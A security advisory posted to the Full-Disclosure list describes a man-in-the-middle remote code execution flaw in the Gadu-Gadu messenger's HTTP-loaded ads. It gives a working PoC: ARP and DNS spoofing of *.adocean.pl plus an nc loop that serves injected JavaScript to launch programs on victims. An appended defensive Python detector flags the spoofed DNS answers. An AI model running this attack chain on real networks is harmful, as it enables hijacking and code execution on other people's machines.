Vendor: Gadu-Gadu (http://gadu-gadu.pl)
Vulnerable Version: All
Vulnerability Type: MITM, Remote Code Execution
Risk level: High
Credit: Kacper Szczesniak <kacper3.14@gmail.com>

Vulnerability Details:

Gadu-Gadu is vulnerable to a Man-In-The-Middle attack that allows remote code execution on the victim host. JavaScript code is loaded from an external HTTP location to display ads. If an attacker is able to take over that HTTP request, it is possible to inject JS code into the WebKit user interface, and the client's internal communication mechanisms can then be used to spawn new processes. No user interaction or contact list presence is needed, as the ads are loaded automatically.

a trivial PoC to spawn notepads all over CoffeeHeaven/LAN:

# echo 1 > /proc/sys/net/ipv4/ip_forward
# arp -s GW_IP GW_MAC
# arpspoof -i eth0 GW_IP
# echo "YOURIP *.adocean.pl" > /tmp/x
# dnsspoof -i eth0 -f /tmp/x
# while [ 1 ] ; do echo -ne "HTTP/1.0 200 OK\r\nConnection: close\r\nContent-Length: 239\r\nContent-Type: text/html\r\n\r\nb=document.getElementsByTagName(\"body\").item(0);\r\nb.innerHTML='<a id=\"a\" href=\"c:/windows/notepad.exe\"></a>';\r\na=document.getElementById('a');\r\ne=document.createEvent('HTMLEvents');\r\ne.initEvent('click', true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done

BTW, the last vulnerability was not really patched. Only a message filter was introduced, so it is still possible to take advantage of it using another MITM.

kacper

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
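As an added defensive example (not part of the original post or of the Gadu-Gadu client): a small Python check over constructed DNS-answer log lines that flags the effect of the dnsspoof step above, an answer for the advisory's ad domain (*.adocean.pl) that points at a private or link-local host instead of the ad network. The log line format and the watched-suffix list are assumptions; it also handles AAAA answers and unparseable lines.

```python
"""Flag DNS answers for the advisory's ad domain (*.adocean.pl) that resolve
to a private, loopback or link-local address, which is what the dnsspoof
step in the PoC produces on the LAN.

Log format is an assumption for this example (not any real tool's output):
    "<epoch> <client-ip> <qname> <A|AAAA> <answer>"
"""
import ipaddress
import re
from dataclasses import dataclass

# Ad domain named in the advisory; extend with other HTTP-loaded ad hosts.
WATCHED_SUFFIXES = ("adocean.pl",)

LINE_RE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+"
    r"(?P<rtype>A|AAAA)\s+(?P<answer>\S+)$"
)


@dataclass
class Finding:
    ts: int
    client: str
    qname: str
    answer: str


def is_watched_domain(qname: str) -> bool:
    """True for the suffix itself or any label under it (case/trailing-dot safe)."""
    name = qname.rstrip(".").lower()
    return any(name == s or name.endswith("." + s) for s in WATCHED_SUFFIXES)


def is_local_answer(answer: str) -> bool:
    """True if the answer is an address a public ad CDN would never hand out."""
    try:
        ip = ipaddress.ip_address(answer)
    except ValueError:  # not an IP literal (CNAME target, junk); ignore
        return False
    return ip.is_private or ip.is_loopback or ip.is_link_local


def scan(lines):
    """Return one Finding per answer that maps a watched domain to a local host."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m and is_watched_domain(m["qname"]) and is_local_answer(m["answer"]):
            findings.append(Finding(int(m["ts"]), m["client"], m["qname"], m["answer"]))
    return findings


# Constructed sample log: one legitimate answer, two spoofed ones, one unrelated, one junk.
SAMPLE_LOG = [
    "1300000000 192.168.1.23 pl.adocean.pl A 93.184.216.34",
    "1300000001 192.168.1.23 pl.adocean.pl A 192.168.1.99",
    "1300000002 192.168.1.23 www.example.com A 192.168.1.99",
    "1300000003 192.168.1.24 ad.adocean.pl AAAA fe80::1",
    "this line is not a DNS record",
]
```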